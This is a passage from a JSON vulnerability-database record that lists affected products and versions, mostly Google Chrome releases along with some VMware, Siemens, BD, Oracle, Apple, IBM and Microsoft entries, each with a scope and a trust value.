        "vendor": "redhat",
        "version": "-7.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.85"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.81"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.889.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.343"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.531.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.89"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.679.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.38"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.20"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.103"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.57"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.300"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.893.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.56"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.644.0"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.0.22"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.70"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.173"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.43"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.570.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.17"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.536.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.81"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.52"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.37"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.313.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.34"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.30"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.172.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.351.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.31"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.45"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.933.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.887.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.23"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1288.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.36"
      },
      {
        "model": "content analysis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "2.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1498.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.793.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.71"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.151"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1301.0"
      },
      {
        "model": "facsvia",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.19"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.34"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.205"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.13"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.29"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.8"
      },
      {
        "model": "vcenter server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1043.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1000.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.19"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.317"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.204"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.342.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.909.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.118"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.13"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.886.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.17"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.17"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.14"
      },
      {
        "model": "simatic ipc477e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.318"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.25"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.96"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.115"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.27"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.936.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.60"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.38"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.488.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.52"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.526.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.19"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.56"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.63"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.808.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.287.0"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.11.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.584.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.33"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1042.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.172.33"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.103"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.302.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.369.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.907.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.120"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.29"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.86"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.71"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1685.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.108"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.25"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.52"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.81"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.823.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.791.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.577.0"
      },
      {
        "model": "macos",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "apple",
        "version": "10.13.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "44.0.2403.89"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1061.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.91"
      },
      {
        "model": "simatic ipc347e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.676.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.210"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.525.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.49"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.90"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.490.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.52"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.681.0"
      },
      {
        "model": "viper lt",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "pyxis procedurestation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.495.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.44"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.500.0"
      },
      {
        "model": "vsphere data protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.0.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.309"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.97"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.3"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.42"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.214"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1050"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.135"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.11"
      },
      {
        "model": "aix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.416.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.950.0"
      },
      {
        "model": "sql server for x64-based systems service pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "200840"
      },
      {
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "7.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.78"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.613.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.36"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.32"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "3.0.182.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1276.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.163"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.16"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.418.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1281.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1049.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.33"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.26"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.304"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.45"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.162"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.18"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.305"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.862.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.464.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.70"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.682.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.35"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.15"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.940.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.22"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.119"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1683.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.151"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.48"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.376.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.50"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.88"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1077.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.38"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1025"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.921.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.17"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.54"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.155"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.538.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.519.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1041.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.69"
      },
      {
        "model": "windows version for x64-based systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "1017030"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.40"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.45"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.561.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1306.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1311.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.586.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.928.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.93"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.766.0"
      },
      {
        "model": "simatic ipc677c",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.23"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.28"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.28"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.34"
      },
      {
        "model": "vcloud usage meter",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "3.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.43"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.740.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.125"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.50"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.50"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.603.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.45"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "40.0.2214.85"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.529.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.95"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.66"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.830.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.31"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.75"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.399.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.203"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.126"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.795.0"
      },
      {
        "model": "vm virtualbox",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.2.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.131"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.687.1"
      },
      {
        "model": "chrome beta",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.249.78"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.335.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.84"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.46"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.925.0"
      },
      {
        "model": "chrome",
